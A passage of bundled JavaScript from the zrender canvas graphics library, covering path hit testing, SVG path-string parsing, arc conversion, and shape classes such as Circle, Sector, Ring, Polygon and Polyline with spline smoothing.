4);\n                }\n                // Consider line width\n                // Line scale can't be 0;\n                if (lineScale > 1e-10) {\n                    rectWithStroke.width += w / lineScale;\n                    rectWithStroke.height += w / lineScale;\n                    rectWithStroke.x -= w / lineScale / 2;\n                    rectWithStroke.y -= w / lineScale / 2;\n                }\n            }\n\n            // Return rect with stroke\n            return rectWithStroke;\n        }\n\n        return rect;\n    },\n\n    contain: function (x, y) {\n        var localPos = this.transformCoordToLocal(x, y);\n        var rect = this.getBoundingRect();\n        var style = this.style;\n        x = localPos[0];\n        y = localPos[1];\n\n        if (rect.contain(x, y)) {\n            var pathData = this.path.data;\n            if (style.hasStroke()) {\n                var lineWidth = style.lineWidth;\n                var lineScale = style.strokeNoScale ? this.getLineScale() : 1;\n                // Line scale can't be 0;\n                if (lineScale > 1e-10) {\n                    // Only add extra hover lineWidth when there are no fill\n                    if (!style.hasFill()) {\n                        lineWidth = Math.max(lineWidth, this.strokeContainThreshold);\n                    }\n                    if (containStroke(\n                        pathData, lineWidth / lineScale, x, y\n                    )) {\n                        return true;\n                    }\n                }\n            }\n            if (style.hasFill()) {\n                return contain(pathData, x, y);\n            }\n        }\n        return false;\n    },\n\n    /**\n     * @param  {boolean} dirtyPath\n     */\n    dirty: function (dirtyPath) {\n        if (dirtyPath == null) {\n            dirtyPath = true;\n        }\n        // Only mark dirty, not mark clean\n        if (dirtyPath) {\n            this.__dirtyPath = dirtyPath;\n            this._rect = null;\n        }\n\n        this.__dirty = this.__dirtyText = true;\n\n        this.__zr && this.__zr.refresh();\n\n        // Used as a clipping path\n        if (this.__clipTarget) {\n            this.__clipTarget.dirty();\n        }\n    },\n\n    /**\n     * Alias for animate('shape')\n     * @param {boolean} loop\n     */\n    animateShape: function (loop) {\n        return this.animate('shape', loop);\n    },\n\n    // Overwrite attrKV\n    attrKV: function (key, value) {\n        // FIXME\n        if (key === 'shape') {\n            this.setShape(value);\n            this.__dirtyPath = true;\n            this._rect = null;\n        }\n        else {\n            Displayable.prototype.attrKV.call(this, key, value);\n        }\n    },\n\n    /**\n     * @param {Object|string} key\n     * @param {*} value\n     */\n    setShape: function (key, value) {\n        var shape = this.shape;\n        // Path from string may not have shape\n        if (shape) {\n            if (isObject$1(key)) {\n                for (var name in key) {\n                    if (key.hasOwnProperty(name)) {\n                        shape[name] = key[name];\n                    }\n                }\n            }\n            else {\n                shape[key] = value;\n            }\n            this.dirty(true);\n        }\n        return this;\n    },\n\n    getLineScale: function () {\n        var m = this.transform;\n        // Get the line scale.\n        // Determinant of `m` means how much the area is enlarged by the\n        // transformation. So its square root can be used as a scale factor\n        // for width.\n        return m && abs(m[0] - 1) > 1e-10 && abs(m[3] - 1) > 1e-10\n            ? Math.sqrt(abs(m[0] * m[3] - m[2] * m[1]))\n            : 1;\n    }\n};\n\n/**\n * 扩展一个 Path element, 比如星形，圆等。\n * Extend a path element\n * @param {Object} props\n * @param {string} props.type Path type\n * @param {Function} props.init Initialize\n * @param {Function} props.buildPath Overwrite buildPath method\n * @param {Object} [props.style] Extended default style config\n * @param {Object} [props.shape] Extended default shape config\n */\nPath.extend = function (defaults$$1) {\n    var Sub = function (opts) {\n        Path.call(this, opts);\n\n        if (defaults$$1.style) {\n            // Extend default style\n            this.style.extendFrom(defaults$$1.style, false);\n        }\n\n        // Extend default shape\n        var defaultShape = defaults$$1.shape;\n        if (defaultShape) {\n            this.shape = this.shape || {};\n            var thisShape = this.shape;\n            for (var name in defaultShape) {\n                if (\n                    !thisShape.hasOwnProperty(name)\n                    && defaultShape.hasOwnProperty(name)\n                ) {\n                    thisShape[name] = defaultShape[name];\n                }\n            }\n        }\n\n        defaults$$1.init && defaults$$1.init.call(this, opts);\n    };\n\n    inherits(Sub, Path);\n\n    // FIXME 不能 extend position, rotation 等引用对象\n    for (var name in defaults$$1) {\n        // Extending prototype values and methods\n        if (name !== 'style' && name !== 'shape') {\n            Sub.prototype[name] = defaults$$1[name];\n        }\n    }\n\n    return Sub;\n};\n\ninherits(Path, Displayable);\n\nvar CMD$2 = PathProxy.CMD;\n\nvar points = [[], [], []];\nvar mathSqrt$3 = Math.sqrt;\nvar mathAtan2 = Math.atan2;\n\nvar transformPath = function (path, m) {\n    var data = path.data;\n    var cmd;\n    var nPoint;\n    var i;\n    var j;\n    var k;\n    var p;\n\n    var M = CMD$2.M;\n    var C = CMD$2.C;\n    var L = CMD$2.L;\n    var R = CMD$2.R;\n    var A = CMD$2.A;\n    var Q = CMD$2.Q;\n\n    for (i = 0, j = 0; i < data.length;) {\n        cmd = data[i++];\n        j = i;\n        nPoint = 0;\n\n        switch (cmd) {\n            case M:\n                nPoint = 1;\n                break;\n            case L:\n                nPoint = 1;\n                break;\n            case C:\n                nPoint = 3;\n                break;\n            case Q:\n                nPoint = 2;\n                break;\n            case A:\n                var x = m[4];\n                var y = m[5];\n                var sx = mathSqrt$3(m[0] * m[0] + m[1] * m[1]);\n                var sy = mathSqrt$3(m[2] * m[2] + m[3] * m[3]);\n                var angle = mathAtan2(-m[1] / sy, m[0] / sx);\n                // cx\n                data[i] *= sx;\n                data[i++] += x;\n                // cy\n                data[i] *= sy;\n                data[i++] += y;\n                // Scale rx and ry\n                // FIXME Assume psi is 0 here\n                data[i++] *= sx;\n                data[i++] *= sy;\n\n                // Start angle\n                data[i++] += angle;\n                // end angle\n                data[i++] += angle;\n                // FIXME psi\n                i += 2;\n                j = i;\n                break;\n            case R:\n                // x0, y0\n                p[0] = data[i++];\n                p[1] = data[i++];\n                applyTransform(p, p, m);\n                data[j++] = p[0];\n                data[j++] = p[1];\n                // x1, y1\n                p[0] += data[i++];\n                p[1] += data[i++];\n                applyTransform(p, p, m);\n                data[j++] = p[0];\n                data[j++] = p[1];\n        }\n\n        for (k = 0; k < nPoint; k++) {\n            var p = points[k];\n            p[0] = data[i++];\n            p[1] = data[i++];\n\n            applyTransform(p, p, m);\n            // Write back\n            data[j++] = p[0];\n            data[j++] = p[1];\n        }\n    }\n};\n\n// command chars\n// var cc = [\n//     'm', 'M', 'l', 'L', 'v', 'V', 'h', 'H', 'z', 'Z',\n//     'c', 'C', 'q', 'Q', 't', 'T', 's', 'S', 'a', 'A'\n// ];\n\nvar mathSqrt = Math.sqrt;\nvar mathSin = Math.sin;\nvar mathCos = Math.cos;\nvar PI = Math.PI;\n\nvar vMag = function (v) {\n    return Math.sqrt(v[0] * v[0] + v[1] * v[1]);\n};\nvar vRatio = function (u, v) {\n    return (u[0] * v[0] + u[1] * v[1]) / (vMag(u) * vMag(v));\n};\nvar vAngle = function (u, v) {\n    return (u[0] * v[1] < u[1] * v[0] ? -1 : 1)\n            * Math.acos(vRatio(u, v));\n};\n\nfunction processArc(x1, y1, x2, y2, fa, fs, rx, ry, psiDeg, cmd, path) {\n    var psi = psiDeg * (PI / 180.0);\n    var xp = mathCos(psi) * (x1 - x2) / 2.0\n                + mathSin(psi) * (y1 - y2) / 2.0;\n    var yp = -1 * mathSin(psi) * (x1 - x2) / 2.0\n                + mathCos(psi) * (y1 - y2) / 2.0;\n\n    var lambda = (xp * xp) / (rx * rx) + (yp * yp) / (ry * ry);\n\n    if (lambda > 1) {\n        rx *= mathSqrt(lambda);\n        ry *= mathSqrt(lambda);\n    }\n\n    var f = (fa === fs ? -1 : 1)\n        * mathSqrt((((rx * rx) * (ry * ry))\n                - ((rx * rx) * (yp * yp))\n                - ((ry * ry) * (xp * xp))) / ((rx * rx) * (yp * yp)\n                + (ry * ry) * (xp * xp))\n            ) || 0;\n\n    var cxp = f * rx * yp / ry;\n    var cyp = f * -ry * xp / rx;\n\n    var cx = (x1 + x2) / 2.0\n                + mathCos(psi) * cxp\n                - mathSin(psi) * cyp;\n    var cy = (y1 + y2) / 2.0\n            + mathSin(psi) * cxp\n            + mathCos(psi) * cyp;\n\n    var theta = vAngle([ 1, 0 ], [ (xp - cxp) / rx, (yp - cyp) / ry ]);\n    var u = [ (xp - cxp) / rx, (yp - cyp) / ry ];\n    var v = [ (-1 * xp - cxp) / rx, (-1 * yp - cyp) / ry ];\n    var dTheta = vAngle(u, v);\n\n    if (vRatio(u, v) <= -1) {\n        dTheta = PI;\n    }\n    if (vRatio(u, v) >= 1) {\n        dTheta = 0;\n    }\n    if (fs === 0 && dTheta > 0) {\n        dTheta = dTheta - 2 * PI;\n    }\n    if (fs === 1 && dTheta < 0) {\n        dTheta = dTheta + 2 * PI;\n    }\n\n    path.addData(cmd, cx, cy, rx, ry, theta, dTheta, psi, fs);\n}\n\n\nvar commandReg = /([mlvhzcqtsa])([^mlvhzcqtsa]*)/ig;\n// Consider case:\n// (1) delimiter can be comma or space, where continuous commas\n// or spaces should be seen as one comma.\n// (2) value can be like:\n// '2e-4', 'l.5.9' (ignore 0), 'M-10-10', 'l-2.43e-1,34.9983',\n// 'l-.5E1,54', '121-23-44-11' (no delimiter)\nvar numberReg = /-?([0-9]*\\.)?[0-9]+([eE]-?[0-9]+)?/g;\n// var valueSplitReg = /[\\s,]+/;\n\nfunction createPathProxyFromString(data) {\n    if (!data) {\n        return new PathProxy();\n    }\n\n    // var data = data.replace(/-/g, ' -')\n    //     .replace(/  /g, ' ')\n    //     .replace(/ /g, ',')\n    //     .replace(/,,/g, ',');\n\n    // var n;\n    // create pipes so that we can split the data\n    // for (n = 0; n < cc.length; n++) {\n    //     cs = cs.replace(new RegExp(cc[n], 'g'), '|' + cc[n]);\n    // }\n\n    // data = data.replace(/-/g, ',-');\n\n    // create array\n    // var arr = cs.split('|');\n    // init context point\n    var cpx = 0;\n    var cpy = 0;\n    var subpathX = cpx;\n    var subpathY = cpy;\n    var prevCmd;\n\n    var path = new PathProxy();\n    var CMD = PathProxy.CMD;\n\n    // commandReg.lastIndex = 0;\n    // var cmdResult;\n    // while ((cmdResult = commandReg.exec(data)) != null) {\n    //     var cmdStr = cmdResult[1];\n    //     var cmdContent = cmdResult[2];\n\n    var cmdList = data.match(commandReg);\n    for (var l = 0; l < cmdList.length; l++) {\n        var cmdText = cmdList[l];\n        var cmdStr = cmdText.charAt(0);\n\n        var cmd;\n\n        // String#split is faster a little bit than String#replace or RegExp#exec.\n        // var p = cmdContent.split(valueSplitReg);\n        // var pLen = 0;\n        // for (var i = 0; i < p.length; i++) {\n        //     // '' and other invalid str => NaN\n        //     var val = parseFloat(p[i]);\n        //     !isNaN(val) && (p[pLen++] = val);\n        // }\n\n        var p = cmdText.match(numberReg) || [];\n        var pLen = p.length;\n        for (var i = 0; i < pLen; i++) {\n            p[i] = parseFloat(p[i]);\n        }\n\n        var off = 0;\n        while (off < pLen) {\n            var ctlPtx;\n            var ctlPty;\n\n            var rx;\n            var ry;\n            var psi;\n            var fa;\n            var fs;\n\n            var x1 = cpx;\n            var y1 = cpy;\n\n            // convert l, H, h, V, and v to L\n            switch (cmdStr) {\n                case 'l':\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'L':\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'm':\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    cmd = CMD.M;\n                    path.addData(cmd, cpx, cpy);\n                    subpathX = cpx;\n                    subpathY = cpy;\n                    cmdStr = 'l';\n                    break;\n                case 'M':\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    cmd = CMD.M;\n                    path.addData(cmd, cpx, cpy);\n                    subpathX = cpx;\n                    subpathY = cpy;\n                    cmdStr = 'L';\n                    break;\n                case 'h':\n                    cpx += p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'H':\n                    cpx = p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'v':\n                    cpy += p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'V':\n                    cpy = p[off++];\n                    cmd = CMD.L;\n                    path.addData(cmd, cpx, cpy);\n                    break;\n                case 'C':\n                    cmd = CMD.C;\n                    path.addData(\n                        cmd, p[off++], p[off++], p[off++], p[off++], p[off++], p[off++]\n                    );\n                    cpx = p[off - 2];\n                    cpy = p[off - 1];\n                    break;\n                case 'c':\n                    cmd = CMD.C;\n                    path.addData(\n                        cmd,\n                        p[off++] + cpx, p[off++] + cpy,\n                        p[off++] + cpx, p[off++] + cpy,\n                        p[off++] + cpx, p[off++] + cpy\n                    );\n                    cpx += p[off - 2];\n                    cpy += p[off - 1];\n                    break;\n                case 'S':\n                    ctlPtx = cpx;\n                    ctlPty = cpy;\n                    var len = path.len();\n                    var pathData = path.data;\n                    if (prevCmd === CMD.C) {\n                        ctlPtx += cpx - pathData[len - 4];\n                        ctlPty += cpy - pathData[len - 3];\n                    }\n                    cmd = CMD.C;\n                    x1 = p[off++];\n                    y1 = p[off++];\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    path.addData(cmd, ctlPtx, ctlPty, x1, y1, cpx, cpy);\n                    break;\n                case 's':\n                    ctlPtx = cpx;\n                    ctlPty = cpy;\n                    var len = path.len();\n                    var pathData = path.data;\n                    if (prevCmd === CMD.C) {\n                        ctlPtx += cpx - pathData[len - 4];\n                        ctlPty += cpy - pathData[len - 3];\n                    }\n                    cmd = CMD.C;\n                    x1 = cpx + p[off++];\n                    y1 = cpy + p[off++];\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    path.addData(cmd, ctlPtx, ctlPty, x1, y1, cpx, cpy);\n                    break;\n                case 'Q':\n                    x1 = p[off++];\n                    y1 = p[off++];\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    cmd = CMD.Q;\n                    path.addData(cmd, x1, y1, cpx, cpy);\n                    break;\n                case 'q':\n                    x1 = p[off++] + cpx;\n                    y1 = p[off++] + cpy;\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    cmd = CMD.Q;\n                    path.addData(cmd, x1, y1, cpx, cpy);\n                    break;\n                case 'T':\n                    ctlPtx = cpx;\n                    ctlPty = cpy;\n                    var len = path.len();\n                    var pathData = path.data;\n                    if (prevCmd === CMD.Q) {\n                        ctlPtx += cpx - pathData[len - 4];\n                        ctlPty += cpy - pathData[len - 3];\n                    }\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    cmd = CMD.Q;\n                    path.addData(cmd, ctlPtx, ctlPty, cpx, cpy);\n                    break;\n                case 't':\n                    ctlPtx = cpx;\n                    ctlPty = cpy;\n                    var len = path.len();\n                    var pathData = path.data;\n                    if (prevCmd === CMD.Q) {\n                        ctlPtx += cpx - pathData[len - 4];\n                        ctlPty += cpy - pathData[len - 3];\n                    }\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    cmd = CMD.Q;\n                    path.addData(cmd, ctlPtx, ctlPty, cpx, cpy);\n                    break;\n                case 'A':\n                    rx = p[off++];\n                    ry = p[off++];\n                    psi = p[off++];\n                    fa = p[off++];\n                    fs = p[off++];\n\n                    x1 = cpx, y1 = cpy;\n                    cpx = p[off++];\n                    cpy = p[off++];\n                    cmd = CMD.A;\n                    processArc(\n                        x1, y1, cpx, cpy, fa, fs, rx, ry, psi, cmd, path\n                    );\n                    break;\n                case 'a':\n                    rx = p[off++];\n                    ry = p[off++];\n                    psi = p[off++];\n                    fa = p[off++];\n                    fs = p[off++];\n\n                    x1 = cpx, y1 = cpy;\n                    cpx += p[off++];\n                    cpy += p[off++];\n                    cmd = CMD.A;\n                    processArc(\n                        x1, y1, cpx, cpy, fa, fs, rx, ry, psi, cmd, path\n                    );\n                    break;\n            }\n        }\n\n        if (cmdStr === 'z' || cmdStr === 'Z') {\n            cmd = CMD.Z;\n            path.addData(cmd);\n            // z may be in the middle of the path.\n            cpx = subpathX;\n            cpy = subpathY;\n        }\n\n        prevCmd = cmd;\n    }\n\n    path.toStatic();\n\n    return path;\n}\n\n// TODO Optimize double memory cost problem\nfunction createPathOptions(str, opts) {\n    var pathProxy = createPathProxyFromString(str);\n    opts = opts || {};\n    opts.buildPath = function (path) {\n        if (path.setData) {\n            path.setData(pathProxy.data);\n            // Svg and vml renderer don't have context\n            var ctx = path.getContext();\n            if (ctx) {\n                path.rebuildPath(ctx);\n            }\n        }\n        else {\n            var ctx = path;\n            pathProxy.rebuildPath(ctx);\n        }\n    };\n\n    opts.applyTransform = function (m) {\n        transformPath(pathProxy, m);\n        this.dirty(true);\n    };\n\n    return opts;\n}\n\n/**\n * Create a Path object from path string data\n * http://www.w3.org/TR/SVG/paths.html#PathData\n * @param  {Object} opts Other options\n */\nfunction createFromString(str, opts) {\n    return new Path(createPathOptions(str, opts));\n}\n\n/**\n * Create a Path class from path string data\n * @param  {string} str\n * @param  {Object} opts Other options\n */\nfunction extendFromString(str, opts) {\n    return Path.extend(createPathOptions(str, opts));\n}\n\n/**\n * Merge multiple paths\n */\n// TODO Apply transform\n// TODO stroke dash\n// TODO Optimize double memory cost problem\nfunction mergePath$1(pathEls, opts) {\n    var pathList = [];\n    var len = pathEls.length;\n    for (var i = 0; i < len; i++) {\n        var pathEl = pathEls[i];\n        if (!pathEl.path) {\n            pathEl.createPathProxy();\n        }\n        if (pathEl.__dirtyPath) {\n            pathEl.buildPath(pathEl.path, pathEl.shape, true);\n        }\n        pathList.push(pathEl.path);\n    }\n\n    var pathBundle = new Path(opts);\n    // Need path proxy.\n    pathBundle.createPathProxy();\n    pathBundle.buildPath = function (path) {\n        path.appendPath(pathList);\n        // Svg and vml renderer don't have context\n        var ctx = path.getContext();\n        if (ctx) {\n            path.rebuildPath(ctx);\n        }\n    };\n\n    return pathBundle;\n}\n\n/**\n * @alias zrender/graphic/Text\n * @extends module:zrender/graphic/Displayable\n * @constructor\n * @param {Object} opts\n */\nvar Text = function (opts) { // jshint ignore:line\n    Displayable.call(this, opts);\n};\n\nText.prototype = {\n\n    constructor: Text,\n\n    type: 'text',\n\n    brush: function (ctx, prevEl) {\n        var style = this.style;\n\n        // Optimize, avoid normalize every time.\n        this.__dirty && normalizeTextStyle(style, true);\n\n        // Use props with prefix 'text'.\n        style.fill = style.stroke = style.shadowBlur = style.shadowColor =\n            style.shadowOffsetX = style.shadowOffsetY = null;\n\n        var text = style.text;\n        // Convert to string\n        text != null && (text += '');\n\n        // Do not apply style.bind in Text node. Because the real bind job\n        // is in textHelper.renderText, and performance of text render should\n        // be considered.\n        // style.bind(ctx, this, prevEl);\n\n        if (!needDrawText(text, style)) {\n            // The current el.style is not applied\n            // and should not be used as cache.\n            ctx.__attrCachedBy = ContextCachedBy.NONE;\n            return;\n        }\n\n        this.setTransform(ctx);\n\n        renderText(this, ctx, text, style, null, prevEl);\n\n        this.restoreTransform(ctx);\n    },\n\n    getBoundingRect: function () {\n        var style = this.style;\n\n        // Optimize, avoid normalize every time.\n        this.__dirty && normalizeTextStyle(style, true);\n\n        if (!this._rect) {\n            var text = style.text;\n            text != null ? (text += '') : (text = '');\n\n            var rect = getBoundingRect(\n                style.text + '',\n                style.font,\n                style.textAlign,\n                style.textVerticalAlign,\n                style.textPadding,\n                style.textLineHeight,\n                style.rich\n            );\n\n            rect.x += style.x || 0;\n            rect.y += style.y || 0;\n\n            if (getStroke(style.textStroke, style.textStrokeWidth)) {\n                var w = style.textStrokeWidth;\n                rect.x -= w / 2;\n                rect.y -= w / 2;\n                rect.width += w;\n                rect.height += w;\n            }\n\n            this._rect = rect;\n        }\n\n        return this._rect;\n    }\n};\n\ninherits(Text, Displayable);\n\n/**\n * 圆形\n * @module zrender/shape/Circle\n */\n\nvar Circle = Path.extend({\n\n    type: 'circle',\n\n    shape: {\n        cx: 0,\n        cy: 0,\n        r: 0\n    },\n\n\n    buildPath: function (ctx, shape, inBundle) {\n        // Better stroking in ShapeBundle\n        // Always do it may have performence issue ( fill may be 2x more cost)\n        if (inBundle) {\n            ctx.moveTo(shape.cx + shape.r, shape.cy);\n        }\n        // else {\n        //     if (ctx.allocate && !ctx.data.length) {\n        //         ctx.allocate(ctx.CMD_MEM_SIZE.A);\n        //     }\n        // }\n        // Better stroking in ShapeBundle\n        // ctx.moveTo(shape.cx + shape.r, shape.cy);\n        ctx.arc(shape.cx, shape.cy, shape.r, 0, Math.PI * 2, true);\n    }\n});\n\n// Fix weird bug in some version of IE11 (like 11.0.9600.178**),\n// where exception \"unexpected call to method or property access\"\n// might be thrown when calling ctx.fill or ctx.stroke after a path\n// whose area size is zero is drawn and ctx.clip() is called and\n// shadowBlur is set. See #4572, #3112, #5777.\n// (e.g.,\n//  ctx.moveTo(10, 10);\n//  ctx.lineTo(20, 10);\n//  ctx.closePath();\n//  ctx.clip();\n//  ctx.shadowBlur = 10;\n//  ...\n//  ctx.fill();\n// )\n\nvar shadowTemp = [\n    ['shadowBlur', 0],\n    ['shadowColor', '#000'],\n    ['shadowOffsetX', 0],\n    ['shadowOffsetY', 0]\n];\n\nvar fixClipWithShadow = function (orignalBrush) {\n\n    // version string can be: '11.0'\n    return (env$1.browser.ie && env$1.browser.version >= 11)\n\n        ? function () {\n            var clipPaths = this.__clipPaths;\n            var style = this.style;\n            var modified;\n\n            if (clipPaths) {\n                for (var i = 0; i < clipPaths.length; i++) {\n                    var clipPath = clipPaths[i];\n                    var shape = clipPath && clipPath.shape;\n                    var type = clipPath && clipPath.type;\n\n                    if (shape && (\n                        (type === 'sector' && shape.startAngle === shape.endAngle)\n                        || (type === 'rect' && (!shape.width || !shape.height))\n                    )) {\n                        for (var j = 0; j < shadowTemp.length; j++) {\n                            // It is save to put shadowTemp static, because shadowTemp\n                            // will be all modified each item brush called.\n                            shadowTemp[j][2] = style[shadowTemp[j][0]];\n                            style[shadowTemp[j][0]] = shadowTemp[j][1];\n                        }\n                        modified = true;\n                        break;\n                    }\n                }\n            }\n\n            orignalBrush.apply(this, arguments);\n\n            if (modified) {\n                for (var j = 0; j < shadowTemp.length; j++) {\n                    style[shadowTemp[j][0]] = shadowTemp[j][2];\n                }\n            }\n        }\n\n        : orignalBrush;\n};\n\n/**\n * 扇形\n * @module zrender/graphic/shape/Sector\n */\n\nvar Sector = Path.extend({\n\n    type: 'sector',\n\n    shape: {\n\n        cx: 0,\n\n        cy: 0,\n\n        r0: 0,\n\n        r: 0,\n\n        startAngle: 0,\n\n        endAngle: Math.PI * 2,\n\n        clockwise: true\n    },\n\n    brush: fixClipWithShadow(Path.prototype.brush),\n\n    buildPath: function (ctx, shape) {\n\n        var x = shape.cx;\n        var y = shape.cy;\n        var r0 = Math.max(shape.r0 || 0, 0);\n        var r = Math.max(shape.r, 0);\n        var startAngle = shape.startAngle;\n        var endAngle = shape.endAngle;\n        var clockwise = shape.clockwise;\n\n        var unitX = Math.cos(startAngle);\n        var unitY = Math.sin(startAngle);\n\n        ctx.moveTo(unitX * r0 + x, unitY * r0 + y);\n\n        ctx.lineTo(unitX * r + x, unitY * r + y);\n\n        ctx.arc(x, y, r, startAngle, endAngle, !clockwise);\n\n        ctx.lineTo(\n            Math.cos(endAngle) * r0 + x,\n            Math.sin(endAngle) * r0 + y\n        );\n\n        if (r0 !== 0) {\n            ctx.arc(x, y, r0, endAngle, startAngle, clockwise);\n        }\n\n        ctx.closePath();\n    }\n});\n\n/**\n * 圆环\n * @module zrender/graphic/shape/Ring\n */\n\nvar Ring = Path.extend({\n\n    type: 'ring',\n\n    shape: {\n        cx: 0,\n        cy: 0,\n        r: 0,\n        r0: 0\n    },\n\n    buildPath: function (ctx, shape) {\n        var x = shape.cx;\n        var y = shape.cy;\n        var PI2 = Math.PI * 2;\n        ctx.moveTo(x + shape.r, y);\n        ctx.arc(x, y, shape.r, 0, PI2, false);\n        ctx.moveTo(x + shape.r0, y);\n        ctx.arc(x, y, shape.r0, 0, PI2, true);\n    }\n});\n\n/**\n * Catmull-Rom spline 插值折线\n * @module zrender/shape/util/smoothSpline\n * @author pissang (https://www.github.com/pissang)\n *         Kener (@Kener-林峰, kener.linfeng@gmail.com)\n *         errorrik (errorrik@gmail.com)\n */\n\n/**\n * @inner\n */\nfunction interpolate(p0, p1, p2, p3, t, t2, t3) {\n    var v0 = (p2 - p0) * 0.5;\n    var v1 = (p3 - p1) * 0.5;\n    return (2 * (p1 - p2) + v0 + v1) * t3\n            + (-3 * (p1 - p2) - 2 * v0 - v1) * t2\n            + v0 * t + p1;\n}\n\n/**\n * @alias module:zrender/shape/util/smoothSpline\n * @param {Array} points 线段顶点数组\n * @param {boolean} isLoop\n * @return {Array}\n */\nvar smoothSpline = function (points, isLoop) {\n    var len$$1 = points.length;\n    var ret = [];\n\n    var distance$$1 = 0;\n    for (var i = 1; i < len$$1; i++) {\n        distance$$1 += distance(points[i - 1], points[i]);\n    }\n\n    var segs = distance$$1 / 2;\n    segs = segs < len$$1 ? len$$1 : segs;\n    for (var i = 0; i < segs; i++) {\n        var pos = i / (segs - 1) * (isLoop ? len$$1 : len$$1 - 1);\n        var idx = Math.floor(pos);\n\n        var w = pos - idx;\n\n        var p0;\n        var p1 = points[idx % len$$1];\n        var p2;\n        var p3;\n        if (!isLoop) {\n            p0 = points[idx === 0 ? idx : idx - 1];\n            p2 = points[idx > len$$1 - 2 ? len$$1 - 1 : idx + 1];\n            p3 = points[idx > len$$1 - 3 ? len$$1 - 1 : idx + 2];\n        }\n        else {\n            p0 = points[(idx - 1 + len$$1) % len$$1];\n            p2 = points[(idx + 1) % len$$1];\n            p3 = points[(idx + 2) % len$$1];\n        }\n\n        var w2 = w * w;\n        var w3 = w * w2;\n\n        ret.push([\n            interpolate(p0[0], p1[0], p2[0], p3[0], w, w2, w3),\n            interpolate(p0[1], p1[1], p2[1], p3[1], w, w2, w3)\n        ]);\n    }\n    return ret;\n};\n\n/**\n * 贝塞尔平滑曲线\n * @module zrender/shape/util/smoothBezier\n * @author pissang (https://www.github.com/pissang)\n *         Kener (@Kener-林峰, kener.linfeng@gmail.com)\n *         errorrik (errorrik@gmail.com)\n */\n\n/**\n * 贝塞尔平滑曲线\n * @alias module:zrender/shape/util/smoothBezier\n * @param {Array} points 线段顶点数组\n * @param {number} smooth 平滑等级, 0-1\n * @param {boolean} isLoop\n * @param {Array} constraint 将计算出来的控制点约束在一个包围盒内\n *                           比如 [[0, 0], [100, 100]], 这个包围盒会与\n *                           整个折线的包围盒做一个并集用来约束控制点。\n * @param {Array} 计算出来的控制点数组\n */\nvar smoothBezier = function (points, smooth, isLoop, constraint) {\n    var cps = [];\n\n    var v = [];\n    var v1 = [];\n    var v2 = [];\n    var prevPoint;\n    var nextPoint;\n\n    var min$$1;\n    var max$$1;\n    if (constraint) {\n        min$$1 = [Infinity, Infinity];\n        max$$1 = [-Infinity, -Infinity];\n        for (var i = 0, len$$1 = points.length; i < len$$1; i++) {\n            min(min$$1, min$$1, points[i]);\n            max(max$$1, max$$1, points[i]);\n        }\n        // 与指定的包围盒做并集\n        min(min$$1, min$$1, constraint[0]);\n        max(max$$1, max$$1, constraint[1]);\n    }\n\n    for (var i = 0, len$$1 = points.length; i < len$$1; i++) {\n        var point = points[i];\n\n        if (isLoop) {\n            prevPoint = points[i ? i - 1 : len$$1 - 1];\n            nextPoint = points[(i + 1) % len$$1];\n        }\n        else {\n            if (i === 0 || i === len$$1 - 1) {\n                cps.push(clone$1(points[i]));\n                continue;\n            }\n            else {\n                prevPoint = points[i - 1];\n                nextPoint = points[i + 1];\n            }\n        }\n\n        sub(v, nextPoint, prevPoint);\n\n        // use degree to scale the handle length\n        scale(v, v, smooth);\n\n        var d0 = distance(point, prevPoint);\n        var d1 = distance(point, nextPoint);\n        var sum = d0 + d1;\n        if (sum !== 0) {\n            d0 /= sum;\n            d1 /= sum;\n        }\n\n        scale(v1, v, -d0);\n        scale(v2, v, d1);\n        var cp0 = add([], point, v1);\n        var cp1 = add([], point, v2);\n        if (constraint) {\n            max(cp0, cp0, min$$1);\n            min(cp0, cp0, max$$1);\n            max(cp1, cp1, min$$1);\n            min(cp1, cp1, max$$1);\n        }\n        cps.push(cp0);\n        cps.push(cp1);\n    }\n\n    if (isLoop) {\n        cps.push(cps.shift());\n    }\n\n    return cps;\n};\n\nfunction buildPath$1(ctx, shape, closePath) {\n    var points = shape.points;\n    var smooth = shape.smooth;\n    if (points && points.length >= 2) {\n        if (smooth && smooth !== 'spline') {\n            var controlPoints = smoothBezier(\n                points, smooth, closePath, shape.smoothConstraint\n            );\n\n            ctx.moveTo(points[0][0], points[0][1]);\n            var len = points.length;\n            for (var i = 0; i < (closePath ? len : len - 1); i++) {\n                var cp1 = controlPoints[i * 2];\n                var cp2 = controlPoints[i * 2 + 1];\n                var p = points[(i + 1) % len];\n                ctx.bezierCurveTo(\n                    cp1[0], cp1[1], cp2[0], cp2[1], p[0], p[1]\n                );\n            }\n        }\n        else {\n            if (smooth === 'spline') {\n                points = smoothSpline(points, closePath);\n            }\n\n            ctx.moveTo(points[0][0], points[0][1]);\n            for (var i = 1, l = points.length; i < l; i++) {\n                ctx.lineTo(points[i][0], points[i][1]);\n            }\n        }\n\n        closePath && ctx.closePath();\n    }\n}\n\n/**\n * 多边形\n * @module zrender/shape/Polygon\n */\n\nvar Polygon = Path.extend({\n\n    type: 'polygon',\n\n    shape: {\n        points: null,\n\n        smooth: false,\n\n        smoothConstraint: null\n    },\n\n    buildPath: function (ctx, shape) {\n        buildPath$1(ctx, shape, true);\n    }\n});\n\n/**\n * @module zrender/graphic/shape/Polyline\n */\n\nvar Polyline = Path.extend({\n\n    type: 'polyline',\n\n    shape: {\n        points: null,\n\n        smooth: false,\n\n        smoothConstraint: null\n    },\n\n    style: {\n        stroke: '#000',\n\n        fill: null\n    },\n\n    buildPath: function (ctx, shape) {\n        buildPath$1(ctx, shape, false);\n    }\n});\n\n/**\n * Sub-pixel optimize for canvas rendering, prevent from blur\n * when rendering a thin 